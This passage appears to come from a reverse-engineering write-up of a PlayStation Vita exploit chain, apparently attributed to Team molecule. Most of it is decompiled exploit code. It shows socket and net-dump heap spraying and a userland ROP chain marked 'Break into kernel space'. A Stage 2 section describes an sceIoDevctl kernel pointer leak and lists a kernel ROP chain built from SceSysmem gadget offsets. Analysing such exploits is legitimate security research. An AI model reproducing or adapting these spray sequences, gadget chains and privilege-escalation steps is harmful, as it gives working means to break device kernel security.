0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);
// sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);
// sceNetSocket("tst", AF_INET, 0x7, 0);
0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);
// Setup "mhm" ROP
0x00(x_stack + 0x00008708) = 0x008DD9B5
0x00(x_stack + 0x0000870C) = 0x000085C4
0x00(x_stack + 0x00008710) = 0x10007300
0x00(x_stack + 0x00008714) = 0x00000000
0x00(x_stack + 0x00008718) = 0x00000000
0x00(x_stack + 0x0000871C) = 0x00009F90
0x00(x_stack + 0x00008720) = 0x00000000
0x00(x_stack + 0x00008724) = 0x000FCDBB
0x00(x_stack + 0x00008728) = 0x00008810
0x00(x_stack + 0x0000872C) = 0x000059A9
0x00(x_stack + 0x00008730) = 0x00000000
0x00(x_stack + 0x00008734) = 0x00000519
/*
"mhm" ROP
// Issue an IOCtl to "tst" FD
int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);
// Store IOCtl result
0x00(x_stack + 0x00008810) = ioctl_res;
// Deadlock
sceWebkit_519();
*/
// Copy "mhm" ROP chain into "mhm" thread's stack
memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);
// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;
// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}
// sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);
// Create several net dumps
// sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);
// Destroy some dumps
sceNetDumpDestroy(x_stack + 0x000085F4);
sceNetDumpDestroy(x_stack + 0x000085FC);
sceNetDumpDestroy(x_stack + 0x00008604);
sceNetDumpDestroy(x_stack + 0x0000860C);
sceNetDumpDestroy(x_stack + 0x00008614);
sceNetDumpDestroy(x_stack + 0x000085E8);
// Create more net dumps
sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);
// Start "mhm" thread
// Thread arguments are loaded into R1 and the gadget
// at the thread's entrypoint then loads register values
// from it, overwritting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
// Delay thread
sceKernelDelayThread(1500000);
// Close no longer needed sockets
sceNetSyscallClose(x_stack + 0x00008470);
sceNetSyscallClose(x_stack + 0x00008478);
sceNetSyscallClose(x_stack + 0x00008480);
sceNetSyscallClose(x_stack + 0x00008488);
sceNetSyscallClose(x_stack + 0x00008490);
sceNetSyscallClose(x_stack + 0x00008498);
sceNetSyscallClose(x_stack + 0x000084A0);
sceNetSyscallClose(x_stack + 0x000084A8);
sceNetSyscallClose(x_stack + 0x000084B0);
sceNetSyscallClose(x_stack + 0x000084B8);
sceNetSyscallClose(x_stack + 0x000084C0);
sceNetSyscallClose(x_stack + 0x000084C8);
sceNetSyscallClose(x_stack + 0x000084D0);
sceNetSyscallClose(x_stack + 0x000084D8);
sceNetSyscallClose(x_stack + 0x000084E0);
sceNetSyscallClose(x_stack + 0x000084E8);
sceNetSyscallClose(x_stack + 0x000084F0);
sceNetSyscallClose(x_stack + 0x000084F8);
sceNetSyscallClose(x_stack + 0x00008500);
sceNetSyscallClose(x_stack + 0x00008508);
sceNetSyscallClose(x_stack + 0x00008510);
sceNetSyscallClose(x_stack + 0x00008518);
sceNetSyscallClose(x_stack + 0x00008520);
sceNetSyscallClose(x_stack + 0x00008528);
sceNetSyscallClose(x_stack + 0x00008530);
sceNetSyscallClose(x_stack + 0x00008538);
sceNetSyscallClose(x_stack + 0x00008540);
sceNetSyscallClose(x_stack + 0x00008548);
sceNetSyscallClose(x_stack + 0x00008550);
sceNetSyscallClose(x_stack + 0x00008558);
sceNetSyscallClose(x_stack + 0x00008560);
sceNetSyscallClose(x_stack + 0x00008568);
sceNetSyscallClose(x_stack + 0x00008570);
sceNetSyscallClose(x_stack + 0x00008578);
sceNetSyscallClose(x_stack + 0x00008580);
sceNetSyscallClose(x_stack + 0x00008588);
sceNetSyscallClose(x_stack + 0x00008590);
sceNetSyscallClose(x_stack + 0x00008598);
sceNetSyscallClose(x_stack + 0x000085A0);
sceNetSyscallClose(x_stack + 0x000085A8);
sceNetSyscallClose(x_stack + 0x000085C4);
// Break into kernel space
sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);
// Destroy another dump
sceNetDumpDestroy(x_stack + 0x000085DC);
// Delay for a while
sceKernelDelayThread(1000000);
// Calculate a SceWebkit pointer using the ioctl
// from "mhm" thread (kernel space?)
r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;
// Unknown
sceWebkit_123();
sceWebkit_CF481();
// Destroy specific dumps (constant IDs)
sceNetDumpDestroy(0x00001770);
sceNetDumpDestroy(0x00001771);
sceNetDumpDestroy(0x00001772);
sceNetDumpDestroy(0x00001773);
sceNetDumpDestroy(0x00001774);
sceNetDumpDestroy(0x00001775);
sceNetDumpDestroy(0x00001776);
sceNetDumpDestroy(0x00001777);
sceNetDumpDestroy(0x00001778);
sceNetDumpDestroy(0x00001779);
sceNetDumpDestroy(0x0000177A);
sceNetDumpDestroy(0x0000177B);
sceNetDumpDestroy(0x0000177C);
sceNetDumpDestroy(0x0000177D);
sceNetDumpDestroy(0x0000177E);
sceNetDumpDestroy(0x0000177F);
sceNetDumpDestroy(0x00001780);
sceNetDumpDestroy(0x00001781);
sceNetDumpDestroy(0x00001782);
sceNetDumpDestroy(0x00001783);
sceNetDumpDestroy(0x00001784);
sceNetDumpDestroy(0x00001785);
sceNetDumpDestroy(0x00001786);
sceNetDumpDestroy(0x00001787);
sceNetDumpDestroy(0x00001788);
sceNetDumpDestroy(0x00001789);
sceNetDumpDestroy(0x0000178A);
sceNetDumpDestroy(0x0000178B);
sceNetDumpDestroy(0x0000178C);
sceNetDumpDestroy(0x0000178D);
sceNetDumpDestroy(0x0000178E);
sceNetDumpDestroy(0x0000178F);
sceNetDumpDestroy(0x00001790);
// Deadlock
sceWebkit_519(0x00000000);
  
Stage 2 leverages a bug in sceIoDevctl in order to leak two distinct kernel pointers. These two pointers refer, respectively, to the SceSysmem module's base address and the SceIoFilemgr(?) thread's stack address:
  •     // Store leaked kernel pointer 1
        // Comes from devctl_outbuf + 0x3D4
        scesysmem_base = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9
        // Store leaked kernel pointer 2
        // Comes from devctl_outbuf + 0x3C4
        sceiofilemgr_stack_base = 0x00(x_stack + 0x000072F8) + 0xFFFFF544
When preparing to write the kernel ROP chain, we can see a few pointers being set. These translate to:
  •     // Kernel ROP inside sceiofilemgr
        // This is where our ROP chain gets copied to inside the SceIoFilemgr module
        kern_rop = sceiofilemgr_stack_base + 0x000006F8
        // Encrypted kernel code
        kern_code = kern_rop + 0x300
Now we write down our kernel ROP chain on the stack, but we can see that some values only get written afterwards.
This is because these values are directly related to the decryption of the next kernel-level stage! Team molecule likely only writes them into the ROP chain later so they can easily update the encrypted stage without having to change the kernel ROP chain directly.
So:
  •     // Overwrite specific NULLs in the ROP chain
        0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)     // kern_code
        0x00(x_stack + 0x00008B48) = 0x00000090
        0x00(x_stack + 0x00008CC0) = 0x00000240
        0x00(x_stack + 0x00008D58) = 0x00000200
        0x00(x_stack + 0x00008D14) = 0x00008FC0                     // kern_next_payload
And our final ROP chain should look like this:
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = scesysmem_base + 0x0000EA73
0x00(x_stack + 0x00008AC0) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008AC4) = scesysmem_base + 0x00027913
0x00(x_stack + 0x00008AC8) = scesysmem_base + 0x0000A523
0x00(x_stack + 0x00008ACC) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD0) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008AD4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AD8) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = scesysmem_base + 0x00000067
0x00(x_stack + 0x00008AE0) = scesysmem_base + 0x0000587F
0x00(x_stack + 0x00008AE4) = scesysmem_base + 0x00019713
0x00(x_stack + 0x00008AE8) = scesysmem_base + 0x00001605
0x00(x_stack + 0x00008AEC) = scesysmem_base + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AFC) = scesysmem_base + 0x00001603
0x00(x_stack + 0x00008B00) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B04) = scesysmem_base + 0x00001F17
0x00(x_stack + 0x00008B08) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B0C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008B10) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B14) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B18) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B1C) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B20) = scesysmem_base + 0x000232EB
0x00(x_stack + 0x00008B24) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B28) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008B2C) = scesysmem_base + 0x00023B61
0x00(x_stack + 0x00008B30) = scesysmem_base + 0x000232F1
0x00(x_stack + 0x00008B34) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B38) = scesysmem_base + 0x00000AE1
0x00(x_stack + 0x00008B3C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B40) = scesysmem_base + 0x000050E9
0x00(x_stack + 0x00008B44) = scesysmem_base + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008B4C) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B50) = scesysmem_base + 0x00012B11
0x00(x_stack + 0x00008B54) = scesysmem_base + 0x00000CE3
0x00(x_stack + 0x00008B58) = scesysmem_base + 0x000000D1
0x00(x_stack + 0x00008B5C) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B60) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008B64) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B68) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008B6C) = scesysmem_base + 0x0001FDC5
0x00(x_stack + 0x00008B70) = scesysmem_base + 0x0001D8DB
0x00(x_stack + 0x00008B74) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B78) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B7C) = scesysmem_base + 0x00011C5F
0x00(x_stack + 0x00008B80) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008B84) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B88) = scesysmem_base + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008B94) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008B98) = scesysmem_base + 0x00001861
0x00(x_stack + 0x00008B9C) = scesysmem_base + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = scesysmem_base + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BA8) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008BAC) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008BB4) = scesysmem_base + 0x00019399
0x00(x_stack + 0x00008BB8) = scesysmem_base + 0x00000347
